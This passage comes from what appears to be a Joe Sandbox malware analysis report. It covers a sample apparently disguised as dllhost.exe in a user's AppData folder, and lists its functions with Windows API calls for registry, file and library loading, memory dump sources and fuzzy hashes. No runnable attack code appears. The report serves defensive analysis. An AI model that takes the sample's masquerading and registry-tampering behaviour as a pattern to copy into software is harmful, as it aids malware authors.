                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                                                              • Instruction ID: 7d50f74d422c9426a2654202d950de31cd619cd826110beab4429d7d99e33e8a
                                                                              • Opcode Fuzzy Hash: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                                                              • Instruction Fuzzy Hash: F9715671E04229DBDF28CF98C9447ADBBB1FF44305F11806AD856BB281C7389986DF44
                                                                              Function 004024F2 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
                                                                              • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402538
                                                                              • RegCloseKey.KERNEL32(?), ref: 00402551
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Enum$CloseValue
                                                                              • String ID:
                                                                              • API String ID: 397863658-0
                                                                              • Opcode ID: 5fe39f6a887c8af29e07c615d6c30983e444cdbe436708b2e3fcea9e6197479e
                                                                              • Instruction ID: caf525ecc09255a736170ff5365d3a7771f075d5505ff7476addd39d58865d97
                                                                              • Opcode Fuzzy Hash: 5fe39f6a887c8af29e07c615d6c30983e444cdbe436708b2e3fcea9e6197479e
                                                                              • Instruction Fuzzy Hash: 4A017171904104EFE7159FA5DE89ABFB6BCEF44348F10403EF105A62D0DAB84E459B69
                                                                              Function 0040247E Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
                                                                              • RegCloseKey.KERNEL32(?), ref: 00402551
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CloseQueryValue
                                                                              • String ID:
                                                                              • API String ID: 3356406503-0
                                                                              • Opcode ID: 1159d50a24b9b01b67aa24e1c7db0f716e147c0a3d96e1b9d2c227e5af43628e
                                                                              • Instruction ID: 1ba1cbfe7526e94493429aa356f7c232dcc3bab2ce10746d05ed9864f28b52f9
                                                                              • Opcode Fuzzy Hash: 1159d50a24b9b01b67aa24e1c7db0f716e147c0a3d96e1b9d2c227e5af43628e
                                                                              • Instruction Fuzzy Hash: C2119131900209EFEB24DFA4CA585AEB6B4EF04344F20843FE046A62C0D6B84A45DB5A
                                                                              Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MulDiv.KERNEL32 ref: 004013E4
                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                                              • Instruction ID: 643084589b99c3aa520b22feaac895240b719bdb66a029b0c5212504e21fbf59
                                                                              • Opcode Fuzzy Hash: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                                              • Instruction Fuzzy Hash: 7A01F4317242119BEB195B799D09B3A3798E710314F14463FF855F62F1DA78CC529B4C
                                                                              Function 00402388 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegDeleteValueW.ADVAPI32 ref: 004023AA
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CloseDeleteValue
                                                                              • String ID:
                                                                              • API String ID: 2831762973-0
                                                                              • Opcode ID: 121319700366869b8af8a076a75455e203a2736033b29138480a111954fdf8a1
                                                                              • Instruction ID: 69a0439a92fed2963c94793673695853850156b7000f6b5095c498e1c7bb27ff
                                                                              • Opcode Fuzzy Hash: 121319700366869b8af8a076a75455e203a2736033b29138480a111954fdf8a1
                                                                              • Instruction Fuzzy Hash: EDF06832A041149BE711ABA49B4DABEB2A59B44354F15053FFA02F71C1D9FC4D41866D
                                                                              Function 00405383 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OleInitialize.OLE32(00000000), ref: 00405393
                                                                                • Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                                                              • OleUninitialize.OLE32(00000404,00000000), ref: 004053DF
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeMessageSendUninitialize
                                                                              • String ID:
                                                                              • API String ID: 2896919175-0
                                                                              • Opcode ID: c4d291e73dbe556e25b8cdf62f2c5066ac8ca80256b4e3a4ac09864a90cce089
                                                                              • Instruction ID: 26d04017d7367bbfa1c35918477487f98c57589759ea251963dc576d4d611ade
                                                                              • Opcode Fuzzy Hash: c4d291e73dbe556e25b8cdf62f2c5066ac8ca80256b4e3a4ac09864a90cce089
                                                                              • Instruction Fuzzy Hash: 98F09072610A00DBE2115754AD01B167764EB80395F15447EFE84A23E196BA48128B7E
                                                                              Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnableShow
                                                                              • String ID:
                                                                              • API String ID: 1136574915-0
                                                                              • Opcode ID: 6606b8f99742d1ecaf3159dc7e92571f133b10ef982ad9a61628a83bb5ccd618
                                                                              • Instruction ID: 9292e16701e7cd97f929a58a5ab9d779cc9b33b2a3d424137dc092703ffa0750
                                                                              • Opcode Fuzzy Hash: 6606b8f99742d1ecaf3159dc7e92571f133b10ef982ad9a61628a83bb5ccd618
                                                                              • Instruction Fuzzy Hash: 52E09232E08200CFD7249BA5AA4946D77B4EB84354720407FE112F11D2DA7848418F69
                                                                              Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: ShowWindow
                                                                              • String ID:
                                                                              • API String ID: 1268545403-0
                                                                              • Opcode ID: 00d951d44db755d0ab3cfbb2ee93fd4c9e1aadd370d035798e149847654a602a
                                                                              • Instruction ID: f017f9f214282da9378315d684086af48e7312a2d574c5b78b61c32a83121298
                                                                              • Opcode Fuzzy Hash: 00d951d44db755d0ab3cfbb2ee93fd4c9e1aadd370d035798e149847654a602a
                                                                              • Instruction Fuzzy Hash: 45E086367001059FCB25DBA4ED848BE77A6EB48310758057FE902F36A1CA759D51CF68
                                                                              Function 00406626 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                                                                • Part of subcall function 004065B6: GetSystemDirectoryW.KERNEL32(?,00000104,UXTHEME), ref: 004065CD
                                                                                • Part of subcall function 004065B6: wsprintfW.USER32 ref: 00406608
                                                                                • Part of subcall function 004065B6: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040661C
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                              • String ID:
                                                                              • API String ID: 2547128583-0
                                                                              • Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                                              • Instruction ID: 40ec7d190cb489a8bb7bfdeabdf724fb2ab18eb81f375fb852db001ef300dc43
                                                                              • Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                                              • Instruction Fuzzy Hash: 06E0863250421166D211A6705E4487763AD9E95650707883FF956F2181D7399C31A66E
                                                                              Function 00405D3E Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\AppData\Roaming\dllhost.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D64
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesCreate
                                                                              • String ID:
                                                                              • API String ID: 415043291-0
                                                                              • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                              • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                              • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                              • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                              Function 00405D19 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFileAttributesW.KERNELBASE(?,?,0040591E,?,?,00000000,00405AF4,?,?,?,?), ref: 00405D1E
                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D32
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                              • Instruction ID: 51a2066edc4c2a81eeb0428f2148d4bf8de4f40e885bab3ef7b7d11008f75862
                                                                              • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                              • Instruction Fuzzy Hash: 72D0C972505420ABC2512728AF0C89BBB95DB542717028B35FAA9A22B0CB304C569A98
                                                                              Function 004057FC Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403330,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,7570D4C4,00403589,?,00000006,00000008,0000000A), ref: 00405802
                                                                              • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405810
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectoryErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1375471231-0
                                                                              • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                              • Instruction ID: ef554e49865ddd63361da1c12a2af0f36bd739cc66983d197ffc2c9f8e40d56f
                                                                              • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
